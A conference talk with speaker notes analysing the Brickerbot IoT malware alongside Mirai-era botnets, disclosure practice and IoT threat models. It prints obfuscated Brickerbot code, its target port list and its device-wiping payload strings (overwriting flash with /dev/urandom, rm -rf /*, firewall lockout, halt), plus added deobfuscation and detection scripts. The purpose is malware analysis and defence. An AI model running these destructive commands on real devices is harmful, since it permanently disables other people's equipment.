Brick all the Internet of Things!!:
We want to make things more secure, right?
Jimmy Shah
Disclaimers
● The views, opinions, and positions expressed in this
presentation are solely those of the author
● They do not necessarily represent the views and
opinions of my employer and do not constitute or imply
any endorsement or recommendation from my
employer
Nixon is a great security researcher and I agree wholeheartedly with the first half of this
statement. Attackers are using botnets primarily for profit, with Distributed Denial of
Service (DDOS) as a primary source of income.
I respectfully disagree with the idea that the only solution is to turn to law enforcement.
Unfortunately, while law enforcement has great powers of investigation and
response after the fact, there are still a number of steps we can take to prevent
attacks.
Ultimately, what’s going with these IoT botnets is crime.
People are talking about these cybersecurity problems —
problems with the devices, etc. — but at the end of the day
it’s crime and private citizens don’t have the power to make
these bad actors stop.
— Allison Nixon,
Director of Security Research
Flashpoint
Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018.
https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
Attackers exploiting botnets to perform large-scale DDOSes has become common. Bots,
robots, zombies, whatever you call them, are nodes in a network of malicious machines.
Traditionally attackers either infected machines with malware or, in a less automated
fashion, convinced users to act as bots.
LOIC is an example of software that allows users to participate in a DDOS. This is the
simplest technique, where each user is independent but collaborates with a multitude
of like-minded users. Imagine a hundred thousand individuals each with a single rifle
all aiming at the same target. Some will miss. Some rifles will misfire. Some will
never understand how to fire a bullet. Regardless, a majority will hit the target. Of
course the efficiency of such an attack is much less than one that eliminates human
error.
Infecting numerous bots is sometimes only the first step. An attacker with hundreds of
thousands or millions of bots needs to do something with them. They make no
money lying idle. This is where another traditional technique is used, DOSaaS (Denial
of Service as a Service). I have a botnet, you pay me to take your target down, we
all profit. Except the major site we've just knocked down.
DDOS
● Traditional
○ What’s a bot?
■ Robots, zombies, etc.
■ Nodes in a network of malicious machines
○ Attacker convinces/infects normal users to become bots
○ Attacker sends commands to DOS a victim site
○ Profit
● Also Traditional, but DOSaaS
○ Attacker buys/rents bots
○ Same as the above
Attackers are looking to make a profit. The usual methods work, but they can be costly.
There is a need to purchase or develop one's own malware to build up one's botnet.
IoT botnets help to reduce those costs. Several IoT botnets have had their source code
released by their authors.
Turns out security on IoT devices is severely lacking. No traffic control, no firewalls, no
real authentication. Default credentials. Let me repeat that: default
username/password combinations that users can't easily change.
Mirai made the big splash, using a long list of default credentials to log in to embedded
devices and then turning them into bots.
Having a list of default creds is useful, but more benevolent trespassers on one's
internet-enabled cameras and home routers can also use the same list in order to log in
and patch your systems. Linux.Wifatch is famous for being a worm that connects to
IoT devices and patches them, locking out the bad guys. Linux.Hajime does
something similar, locking down ports to prevent other botnets from connecting.
As another show of good faith, the authors of Linux.Wifatch released the source code to
their patching worm.[1]
Good or bad, none of these worms would gain as much traction amongst IoT devices if
it were possible to modify logins.
[1] https://gitlab.com/rav7teif/linux.wifatch
DDOS via IoT Botnet
● Similar to DDOSaaS
○ Except the bots are free
■ Even more free? Due to default creds.
Mirai
Linux.Wifatch Linux.Hajime
Right so, Brickerbot. Where Wifatch and Hajime do their part in securing devices by
changing passwords or disabling outside access, Brickerbot goes about it in a
slightly different manner. If we just brick all of these vulnerable IoT devices they can’t
be turned against us. Great idea.
Mudge, of L0pht and DARPA, has heard about this idea too. From reasonable folks in
the Intelligence Community and the Department of Defense. These are kind of the
folks who get to take direct action. Except it seems even they couldn’t get away with
bricking the devices of civilians in the US and all over the world.
So, Brickerbot?
The author of Brickerbot calls himself The Doctor. He has also posted on an
underground forum as ‘Janitor’. Sometimes attribution is easy, like when an actor
directly connects online identities or claims credit. Attribution is harder when all you
have is the end result such as a binary or obfuscated script.
A source code release like the authors of Linux.Wifatch did is a primary method of
claiming authorship. Releasing an obfuscated script that doesn’t or cannot execute is
like showing off portions of a wrecked fighter aircraft with any and all markings or
identifying information missing/removed. It makes for a great showpiece and allows
one to take or (more often) give credit. Other researchers suggest that some of the
attacks that The Doctor claimed, such as one on a major mobile carrier’s network,
were not performed by him or at least not using any of the exploits contained in
Brickerbot. Do we just take the word of whichever party we have a greater trust in?
Minus a release of source or of forensic results from various attacks it seems that’s
the default position.
Where are we?
1) We may not be able to trust Brickerbot’s ‘author’
2) The publicly available sample is essentially an obfuscated list of exploits and
‘bricking’ code
3) We need to examine the Brickerbot code a little closer to see what we have
Bricking is just turning useful devices into something as useful as a brick. This is a
perfectly legal action that one can perform on devices that one owns. When done to
others, it is almost always illegal and occasionally an act of war.
To be clear, Brickerbot is intended to operate entirely on others’ devices.
So, Brickerbot?
● What’s bricking?
○ Turning a useful device into something as useful as a ‘brick’
Normally, coming from the malware analysis side, I'm loath to help spread malware. In
this case the cat is out of the bag, the horses have left the barn, and there are
dozens of pastebin-like sites and one or two github accounts with a copy of the
released Brickerbot script.
So if you would like a copy of the script in order to play along at home/analyze, just
google for the following line.
Brickerbot: source code
● Want a copy of Brickerbot?
○ Google
■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1”
● Mirrored on github and various pastebin like sites
A quick aside about the malware analysis process. Assuming you're not doing it as a
hobby, it's almost always performed under pressure.
One never has enough time to do a complete teardown, to check every nook and cranny
of a given target. You may love puzzles and even enjoy completely solving them, but
you never have that time at work. When you eventually do, it’s known as that nearly
mythical time period ‘vacation’.
An analyst always has to deal with multiple competing pressures from various interested
parties. In no particular order:
● Customers
● Bosses/Upper Management
● Competitors
● Press
Depending on how one receives a sample one or more of these will be aware and the
clock starts ticking. One won’t always satisfy all parties. Regardless, handling the
various competing interests is the job.
OK, you don't have unlimited time. A customer is under attack. The press is minutes from
publishing. Higher-ups are yelling at your boss for an update. What do you do?
Generally one searches for IOCs (Indicators of Compromise). It really does become:
What is the least I need to see before I know my home/office/business is irrecoverable?
Aside: Malware analysis process - under pressure
● Not always enough time
○ fully unwind and solve every aspect of every puzzle within a sample
■ That’s called ‘vacation’
● Interested parties breathing down analysts’ necks
○ Customers, bosses, competitors, press
■ Handling these is ‘the job’
● Identify IOCs (Indicators of Compromise)
○ What is the least I need to see before I know my home/office/business is irrecoverable?
What has The Doctor dropped in our collective laps?
We've got a script that appears obfuscated. No line listing the interpreter the shell
should use. First steps for analyzing this malware:
1) Let's see if it runs
a) Make sure the VM has no network access
b) Include possible runtimes (python2, python3)
Shocker! It doesn't run. Why?
Running with Python 3 fails, mainly due to the print statement becoming a
function in Python 3. Thus we know it's Python 2.
Running under Python 2 it fails. Symbol not found. In this case due to additional
whitespace turning a function call into an undefined symbol. Next, we need to
remove extraneous whitespace.
Re-run and it fails again. This time due to not a single library being imported. You
have to be kidding me. The script as provided was never intended to run.
2) Maybe de-obfuscating the script would simplify the analysis
● Writing a custom de-obfuscator is a good solution; unfortunately it's a
vacation project. We've still got a job to do.
○ It's good to get acquainted with tokenizer.py for that eventual
vacation
● We can still write a one-off script to quickly remove dead code. Dead
code being things like if statements that are always false, or statements
Brickerbot: Getting to the heart of the issue
● Malware analysis
○ Get it running (VM, python(s), no network)
■ Nope, bad interp. Python2
■ Nope, symbol not found. ‘Extra’ whitespace.
■ Nope, libraries not imported. Enough nonsense.
○ De-obfuscate
■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’.
● (still, become friends with tokenizer.py)
■ Custom script to remove dead code
● Become friends with PyLint
■ Pretty-print remainder of source
Now that you've figured out it's non-functional, it's time to find all the low-hanging fruit. In
this case the author provided the initial hint, suggesting that one could just check the
unencrypted/unobfuscated strings.
One of the first steps in statically analyzing all malware is to extract all strings. Really.
Some of the best clues for attribution come from identifiers left in the code, or
shout-outs to colleagues or malware researchers. Egos have led to a number of malware
authors getting convicted.
In the case of Brickerbot, the simple obfuscation used by the author removes all
identifiers (i.e. variable names, messages, etc.). It's more about not having it tied
back to the author than making it difficult to learn how the worm operates.
Another time-saver used in analysis is to read other analysts' reports. This lets you see
if you've missed anything important (e.g. malware emailing all your contacts). It also
lets you re-direct analysis to portions of the malware not yet analyzed or to specific
payloads.
With Brickerbot, since it won't run and there's much useless code, an analyst can look at
it as a container for various IoT device exploits.
Brickerbot: Getting to the heart of the issue, cont.
● Malware analysis
○ Examine low-hanging fruit
■ Strings
● Seriously
● First step used by malware analysts
■ Read reports by other analysts
● Catch what you missed/ran out of time to find
● Re-prioritize resources towards areas that have greatest impact
Let’s look at the Brickerbot source code.
Random, similar-looking variable names, more whitespace than necessary. This looks
horrible.
The if statements where the conditional is equivalent to 0 will never run the code that
follows. Dead code.
There are spaces in function calls. These don't even help readability, so the sleep call on
line 7 isn't actually a .sleep() call; it's just the undefined symbol time, a dot, and the
undefined symbol sleep.
Much of this can be removed, as described earlier, with a custom script to delete all dead
code.
Brickerbot: Source code - obfusc., ex. whitespace
1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
4. if 21 - 21: Oooo - I11I1Ii
5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
7. time . sleep ( 3 )
8. if 20 - 20: Oo0
9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
12. if 84 - 84: I11I1Ii * Ii11i1iIi
13. I1IiI1I1 = OOo0O0oOOOO
14. if 4 - 4: Oooo + oOOo0000o
15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
16. i111IIIiII1i = False
17. Oo0O00OOooO = False
18. IiiI1 = False
19. oOI11IIIi1II111 = True
20. iiIII11I1i1Ii = True
21. I1i = True
22. i11iiiIi = True
23. i1iii = True
24. OOoOo00oO0 = True
25. OO00oo0o = True
26. if 5 - 5: IIiII + O0oo - i1
27. if 52 - 52: oOoO0Ooo / Ii / Ii
28. if 24 - 24: oOOoO00oo0
29. i11 = [ ]
30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ]
31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
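The dead-code removal and whitespace clean-up the notes describe, as an added example (not The Doctor's script and not the author's one-off tool): it folds the `if <n> - <n>:` guards with Python's ast module rather than tokenizer.py, and ast.unparse does the pretty-printing. SAMPLE is a constructed input in the style of the listing above; Python 3.9+ is assumed.

```python
"""Strip constant-guard dead code and surplus whitespace from obfuscated Python.

Added example, not from the deck or any project. Every `if <number> - <number>:`
guard in the listing folds to 0, so its body can never execute; the ast module
finds those guards, and ast.unparse re-emits `time . sleep ( 3 )` as `time.sleep(3)`.
"""
import ast
import operator

# Constructed input in the style of the obfuscated slide listing (not the real sample).
SAMPLE = """\
if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
time . sleep ( 3 )
if 20 - 20: Oo0
I1IiI1I1 = OOo0O0oOOOO
i111IIIiII1i = False
II1I1i11 = [ 23 , 2222 , 2323 , 7547 ]
def IIi1IIii11I1I(targetip, targetport):
    if 4 - 4: Oooo + oOOo0000o
    O0000oO0O = (targetip, int(targetport))
    if 1 - 1: pass
    return O0000oO0O
"""

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
        ast.Div: operator.truediv, ast.Mod: operator.mod}


def fold_constant(node):
    """Return the value of an expression built only from numeric literals, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, (bool, int, float)):
        return node.value
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        value = fold_constant(node.operand)
        return None if value is None else -value
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        left, right = fold_constant(node.left), fold_constant(node.right)
        if left is None or right is None:
            return None
        try:
            return _OPS[type(node.op)](left, right)
        except ZeroDivisionError:
            return None  # would raise at runtime; not a foldable guard
    return None


def guard_value(expr_source):
    """Fold a test expression given as text: '57 - 57' -> 0, 'x - 57' -> None."""
    return fold_constant(ast.parse(expr_source, mode="eval").body)


class DeadGuardRemover(ast.NodeTransformer):
    """Drop `if` statements whose test folds to a constant, keeping only the live branch."""

    def __init__(self):
        self.removed = 0

    def visit_If(self, node):
        self.generic_visit(node)  # fold nested guards first
        value = fold_constant(node.test)
        if value is None:
            return node  # data-dependent test: real control flow, keep it
        self.removed += 1
        live = node.body if value else node.orelse
        return live or None  # a list splices into the parent block; None deletes the node


def strip_dead_code(source):
    """Return (cleaned source, number of constant guards removed)."""
    tree = ast.parse(source)
    remover = DeadGuardRemover()
    tree = remover.visit(tree)
    # Removing every statement of a block would leave invalid Python; pad with `pass`.
    for node in ast.walk(tree):
        if not isinstance(node, ast.Module) and getattr(node, "body", None) == []:
            node.body = [ast.Pass()]
    ast.fix_missing_locations(tree)
    cleaned = ast.unparse(tree)  # pretty-prints, normalising the surplus whitespace
    compile(cleaned, "<cleaned>", "exec")  # syntax check only; nothing is executed
    return cleaned, remover.removed


if __name__ == "__main__":
    text, count = strip_dead_code(SAMPLE)
    print(f"# removed {count} dead guards\n{text}")
```

The cleaned output still references undefined names and imports nothing, exactly as the notes say of the real sample; the point is readability for static review, not execution.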
OK, now things are looking a bit cleaner; we can see functions. Names that have been
obfuscated are lost, but one can eventually rename them according to their function,
similar to what one does with functions in an unknown binary.
This is also after pretty-printing the script so that we get rid of the excessive/additional
whitespace.
Also, as mentioned earlier, no libraries are imported, so the code still won't run.
You should be getting a better picture of the roadblocks placed in the code.
Brickerbot: Source code - eliminate dead code
def IIi1IIii11I1I(targetip, targetport):
    global i1Iiii1i11i
    O0000oO0O = (targetip, int(targetport))
    I11i1I = hash(O0000oO0O)
    if I11i1I in iIIiii11Ii1:
        return
    IiI1i1ii1[I11i1I] = 0
    ooOo0I1ii1i[I11i1I] = (targetip, int(targetport))
    oo0[I11i1I] = time.time() + i1Iiii1i11i * 60
    iIoO000oO[I11i1I] = None
    iIIiii11Ii1.append(I11i1I)

def i1iiiiIi(targetip, targetport, jobhash):
    O0000oO0O = (targetip, int(targetport))
    O0OOo00o00o = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    O0OOo00o00o.setblocking(0)
    try:
        O0OOo00o00o.connect(O0000oO0O)
    except:
        pass
    I11i1I = hash(O0OOo00o00o)
    O00OiiI1iIiiI.append(O0OOo00o00o)
    Oooo0[I11i1I] = (targetip, int(targetport))
    Iii1iiiI[I11i1I] = 0
    i1I11IIIIIi[I11i1I] = time.time()
    I1iiO000o00o0[I11i1I] = jobhash
    iIoO000oO[jobhash] = O0OOo00o00o
    return O0OOo00o00o
Now we can go back to step 1 of the static malware analysis process, searching for
strings.
This particular segment includes commands that overwrite storage on a particular
device with random data. Routes and firewall rules are cleared from memory and
deleted. Then the system is stopped and rebooted. By now there should be no code
left to run so your home router is now useless.
So what do we know now?
1) this code is annoying
2) so is The Doctor
3) all devices with the default username and password will get disabled permanently
4) vulnerable devices are fixed now; since they can't work, they're safe
So smaller IoT/embedded devices are quite vulnerable and badly secured. Do bigger
embedded systems and Internet-connected devices face similar threats? Can a
Brickerbot for my washing machine be far away? Would other larger devices
be more vulnerable? Say, my car?
Brickerbot: Source code - Strings, bricking
ii11II += '''busybox route del default
cat /dev/urandom >/dev/mtdblock0 &
cat /dev/urandom >/dev/mtdblock1 &
cat /dev/urandom >/dev/mtdblock2 &
cat /dev/urandom >/dev/mtdblock3 &
cat /dev/urandom >/dev/mtdblock4 &
cat /dev/urandom >/dev/mtdblock5 &
cat /dev/urandom >/dev/mmcblk0 &
cat /dev/urandom >/dev/mmcblk0p9 &
cat /dev/urandom >/dev/mmcblk0p12 &
cat /dev/urandom >/dev/mmcblk0p13 &
cat /dev/urandom >/dev/root &
cat /dev/urandom >/dev/mmcblk0p8 &
cat /dev/urandom >/dev/mmcblk0p16 &
'''
ii11II += '''route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &
iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP
halt -n -f
reboot
'''
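Added example, not part of the deck: detection logic that flags the bricking sequence above (storage overwrite, route and firewall teardown, filesystem wipe, halt) in a honeypot command transcript. The log format, timestamps and addresses are constructed; a scoped rm -rf and a lone reboot are included to show what is not flagged.

```python
"""Flag Brickerbot-style bricking commands in a captured IoT shell session.

Added example, not from the deck. The indicator patterns mirror the payload
strings on the slide; the transcript below is constructed (documentation
address ranges), one command per line as a telnet honeypot might record it.
"""
import re
from collections import defaultdict

# Constructed sample transcript; the first line is banner noise that must be skipped.
SESSION_LOG = """\
BusyBox v1.22.1 built-in shell (ash)
2018-01-24T10:01:02Z 203.0.113.7 cmd: busybox route del default
2018-01-24T10:01:02Z 203.0.113.7 cmd: cat /dev/urandom >/dev/mtdblock0 &
2018-01-24T10:01:03Z 203.0.113.7 cmd: cat /dev/urandom >/dev/mmcblk0p9 &
2018-01-24T10:01:03Z 203.0.113.7 cmd: iptables -F;iptables -t nat -F;iptables -A INPUT -j DROP
2018-01-24T10:01:04Z 203.0.113.7 cmd: rm -rf /* 2>/dev/null &
2018-01-24T10:01:04Z 203.0.113.7 cmd: halt -n -f
2018-01-24T10:05:00Z 198.51.100.9 cmd: cat /proc/cpuinfo
2018-01-24T10:05:01Z 198.51.100.9 cmd: rm -rf /tmp/.x
2018-01-24T10:05:02Z 198.51.100.9 cmd: reboot
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) cmd: (?P<cmd>.*)$")

# Indicator classes. The two destructive ones are what turn a session into a bricking attempt.
INDICATORS = {
    "storage_overwrite": re.compile(
        r"cat\s+/dev/(?:u?random|zero)\s*>\s*/dev/(?:mtdblock|mmcblk|root|sd)"),
    # `rm -rf /` or `rm -rf /*` only; a scoped path such as /tmp/.x does not match.
    "filesystem_wipe": re.compile(r"\brm\s+-rf\s+/\*?(?=\s|;|$)"),
    "route_teardown": re.compile(r"\b(?:ip\s*)?route\s+del\s+default\b"),
    "firewall_lockout": re.compile(r"\biptables\b.*-j\s+DROP\b"),
    "power_off": re.compile(r"\b(?:halt|reboot)\b"),
}
DESTRUCTIVE = {"storage_overwrite", "filesystem_wipe"}


def classify_command(cmd):
    """Return the set of indicator names matched by one shell command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}


def summarise_sessions(log_text):
    """Collect matched indicators per source address across a whole transcript."""
    per_source = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner or noise: skip rather than abort the run
        per_source[m["src"]] |= classify_command(m["cmd"])
    return dict(per_source)


def is_bricking_attempt(indicators):
    """A destructive write/wipe plus any teardown or power action reads as bricking;
    a lone reboot or a scoped rm -rf does not."""
    return bool(indicators & DESTRUCTIVE) and len(indicators) >= 2


def bricking_sources(log_text):
    """Sorted source addresses whose commands amount to a bricking attempt."""
    summary = summarise_sessions(log_text)
    return sorted(src for src, ind in summary.items() if is_bricking_attempt(ind))


if __name__ == "__main__":
    for src, ind in summarise_sessions(SESSION_LOG).items():
        print(src, sorted(ind), "BRICKING" if is_bricking_attempt(ind) else "")
```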
What’s the worst that can happen to my car? Can it become part of a botnet? Let’s see
what an expert on automotive security thinks.
Charlie Miller is formerly of the NSA, but has made a name for himself in the private
sector as a capable security researcher. Sorta reminds me of Star Trek’s Captain
Picard, clever and wise.
He wrote the first public exploits for Android and iOS, on the Google G1 and original
iPhone. Later he and Chris Valasek received a grant from DARPA's Cyber Fast
Track program (the same one founded by Mudge) to research automotive security.
So he moved on from hacking PCs, to hacking phones, to hacking the very cars you
and I drive.
And people complained, 'but those aren't remote exploits. You've got to be in the car to
hack them. Any crook can do that.'
And verily, Charlie and Chris developed remote exploits.
So when Charlie says that
1) it's not simple to hack all the cars
2) there aren't as many people hacking cars
you'd do well to believe him.
“Zombie” cars
Except movie hackers…
If you've seen the seminal 'Hackers' (1996) you know that "real" hackers can be
determined by their hairstyles, dreadlocks in fact possibly being a necessary factor
in successful cyber attacks, e.g. Matthew Lillard's character Cereal Killer. As one can
see, Ms. Theron's character, Cypher, must be quite the criminal hacker.
After all, the main heroes in the film (Johnson, Diesel & Statham) lack both hair and
computer skills.
Realistically one can get a better sense of the threat posed by Cypher by viewing her
environment. She is obviously well-funded (either State-backed or via independent
fortune) and employs a full team of experts, especially experts that can hack cars.
When an underling tells her there are a couple thousand cars in the vicinity of her target,
she orders him to hack all of them. Yes, all of them. Never mind the brand, the
telematics system, any and all firmware (or lack of such) within each of these
thousands of automobiles. Those hacker dreads must confer some extreme hacking
powers.
“Zombie” cars - “It’s Zombie time.”
We know Cypher’s a dangerous criminal hacker, cause: Hacker Dreads
We should just brick everybody's car in a 5 mile radius. It's not like anyone needs to get
to work, pick up their kids, drive a buddy to the hospital, or drive for Lyft/Uber. Maybe
they didn't really need their personal cars.
This goes back to the original idea of abdicating any responsibility as developers and
manufacturers of IoT devices to law enforcement. Or, in the case of The Doctor, to
vigilantes.
It's a common idea that fixing bugs at the earliest point in development is many times
cheaper and less dangerous than patching them after release, though we can't
always fix before customers take possession.
It's possible to release firmware updates and patches afterwards, but there is not always
an incentive to do so. The manufacturer of my car will occasionally release updates for
the telematics system living in my dash, but the manufacturer of my new Internet-enabled
toaster might say it's no longer supported.
This is not usually a problem, until attackers not as benevolent as the Wifatch and
Hajime authors or Charlie & Chris discover and exploit a vulnerability to turn your
new Mustang into a torpedo. With Miller & Valasek I know they'll make an effort to
reach out to the manufacturer and enable a patch or update to be created.
We can learn lessons from the way vulnerability reports are handled on other platforms.
Embedded systems and IoT devices are not as dissimilar from desktop and server
PCs as one would think. The same way security researchers reach out to Apple or
Google for bugs in their phone OSes, they can reach out to various device
manufacturers.
“Zombie” cars
So in order to stop Criminals from hijacking our cars and turning them into
bombs...
It can be difficult to get industry members to agree on issues like vulnerability disclosure,
regular patching and in general working with outside security researchers. It is very
much like the common description of ‘herding cats’. While many of the players may
look similar and even share similar interests it is difficult to get them all to come to
the table.
Each company has no special reason to trust another. It usually takes commonly trusted
individuals and backing from companies with greater resources just to begin the
conversation.
Fortunately we’re seeing motion towards that goal in a small subset of the Internet of
Things/Internet-connected embedded devices.
Security: Gaining industry buy-in
Security: Gaining industry buy-in; Doing it right?
How do we get all these cats eating peacefully at the same bowl?
We can start by selecting someone credible and trusted widely as a focal point for the
multitude of players. Get a Pied Piper that all the cats can turn towards. In this case
that would be Renderman(Brad Haines), a well known and respected security
researcher. He’s also a CISSP.
Renderman has a wide range of experience with penetration testing, wireless security
and computer security research. He is a published author and a speaker at numerous
computer security (Black Hat USA) and hacker (Def Con) conferences.
The interesting part of this is that Renderman is operating within the category of items
that fall under the heading ‘Adult Sex Toys’ on Amazon.com.
One might have expected that other personal IoT devices, such as fitness trackers,
would be where more security research would occur. The recent information leak
from Strava which showed running paths of US armed forces members is one such
area of research. Here a personal IoT device’s lack of default security and privacy
controls ends up violating Operational Security(OPSEC) at US bases around the
world. The main threat is not the bases’ locations(arguably opposition forces and
host countries already have that knowledge), but more that of current intelligence
confirming activity at the bases and possibly number/names of active personnel.
Renderman has accomplished something that those of us in other specialties (e.g.
Antivirus/Anti-malware) haven't: he's managed to convince disparate manufacturers
to trust him, both as a source of best security practices and as an interface to the
wider community of vulnerability researchers and hackers.
Security: Gaining industry buy-in; Doing it right
1. Get someone credible to organize/liaise with industry players
a. Renderman
2. Provide guidelines for disclosure to vendors
3. Provide guidelines for communication with researchers
4. Suggest/provide solutions
a. Mostly suggest. Nobody’s using provided code.
5. Branding
a. Internet of Dongs Project
b. DVEs(Dong Vulnerability and Exposures)
Q: What sort of threat model are IoT vendors using?
A: Good question. Default credentials imply there is no threat model. A basic threat
model would take into account the simplest attacker, your common script kiddie.
Take a dictionary of default credentials and a list of target addresses and feed them to
a scanner or ready-made tool. Even after the number of in-the-wild IoT worms we've
seen, the script kiddie would still end up with control of a significant number of IoT
devices. Unfortunately security is currently at best an afterthought for a large number
of vendors.
A proper threat model would need to take into account attackers of various skill levels
and budgets.
Script kiddies might be kept at bay by simply allowing users to easily change
passwords, or by using public-key encryption to ensure firmware updates come only
from the manufacturer, which would also protect the device from script kiddies. Best
practices in security will overall protect the bulk of users. If your threat model also
includes Nation-State actors, then it's likely your development budget is of a
commensurate size.
It would also need to consider the attack surface for a given device. Does it connect to
the Internet? Is the firmware protected from modification? Can an attacker cause the
Li-ion batteries to overload/ignite? Is it possible to inject malicious traffic into the
stream of commands sent to the device?
Regardless, these are factors that need to be considered at the beginning of the
development cycle and not once the product is in the hands of consumers. Once there, it
is considerably more expensive to mitigate (e.g. by patching, or recalling devices).
Questions?


Brick all the internet of things!(with notes)

  • 1. Brick all the Internet of Things!!: We want to make things more secure, right? Jimmy Shah
  • 2. Disclaimers ● The views, opinions, and positions expressed in this presentation are solely those of the author ● They do not necessarily represent the views and opinions of my employer and do not constitute or imply any endorsement or recommendation from my employer
  • 3. Ultimately, what’s going with these IoT botnets is crime. People are talking about these cybersecurity problems — problems with the devices, etc. — but at the end of the day it’s crime and private citizens don’t have the power to make these bad actors stop. — Allison Nixon, Director of Security Research Flashpoint Krebs, Brian. "Krebs on Security." January 18, 2018. Accessed January 24, 2018. https://krebsonsecurity.com/2018/01/expert-iot-botnets-the-work-of-a-vast-minority/.
  • 4. DDOS ● Traditional ○ What’s a bot? ■ Robots, zombies, etc. ■ Nodes in a network of malicious machines ○ Attacker convinces/infects normal users to become bots ○ Attacker sends commands to DOS a victim site ○ Profit ● Also Traditional, but DOSaaS ○ Attacker buys/rents bots ○ Same as the above
  • 5. DDOS via IoT Botnet ● Similar to DDOSaaS ○ Except the bots are free ■ Even more free? Due to default creds. Mirai Linux.Wifatch Linux.Hajime
  • 7.
  • 8. So, Brickerbot? ● What’s bricking? ○ Turning a useful device into something as useful as a ‘brick’
  • 9. Brickerbot: source code ● Want a copy of Brickerbot? ○ Google ■ “if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1” ● Mirrored on github and various pastebin like sites
  • 10. Aside: Malware analysis process - under pressure ● Not always enough time ○ fully unwind and solve every aspect of every puzzle within a sample ■ That’s called ‘vacation’ ● Interested parties breathing down analysts’ necks ○ Customers, bosses, competitors, press ■ Handling these is ‘the job’ ● Identify IOCs(Indicators of Compromise) ○ What is the least I need to see before I know my home/office/business is irrecoverable?
  • 11. Brickerbot: Getting to the heart of the issue ● Malware analysis ○ Get it running(VM, python(s), no network) ■ Nope, bad interp. Python2 ■ Nope, symbol not found. ‘Extra’ whitespace. ■ Nope, libraries not imported. Enough nonsense. ○ De-obfuscate ■ Write custom deobfuscator. Nope, that’s a ‘vacation’ project; see ‘the job’. ● (still, become friends with tokenizer.py) ■ Custom script to remove dead code ● Become friends with PyLint ■ Pretty-print remainder of source
  • 12. Brickerbot: Getting to the heart of the issue,cont. ● Malware analysis ○ Examine low-hanging fruit ■ Strings ● Seriously ● First step used by malware analysts ■ Read reports by other analysts ● Catch what you missed/ran out of time to find ● Re-prioritize resources towards areas that have greatest impact
  • 13. Brickerbot: Source code - obfusc., ex. whitespace 1. if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI 2. if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00 3. if 49 - 49: o0oooooO / Ii11i1iIi * O0oo 4. if 21 - 21: Oooo - I11I1Ii 5. if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO 6. if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO 7. time . sleep ( 3 ) 8. if 20 - 20: Oo0 9. if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1 10. if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1 11. if 60 - 60: o0oooooO + Ii + Ii % o0oooooO 12. if 84 - 84: I11I1Ii * Ii11i1iIi 13. I1IiI1I1 = OOo0O0oOOOO 14. if 4 - 4: Oooo + oOOo0000o 15. if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0 16. i111IIIiII1i = False 17. Oo0O00OOooO = False 18. IiiI1 = False 19. oOI11IIIi1II111 = True 20. iiIII11I1i1Ii = True 21. I1i = True 22. i11iiiIi = True 23. i1iii = True 24. OOoOo00oO0 = True 25. OO00oo0o = True 26. if 5 - 5: IIiII + O0oo - i1 27. if 52 - 52: oOoO0Ooo / Ii / Ii 28. if 24 - 24: oOOoO00oo0 29. i11 = [ ] 30. II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 ,88 , 81 , 8080 , 8081 , 49152 , 5431 ] 31. if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
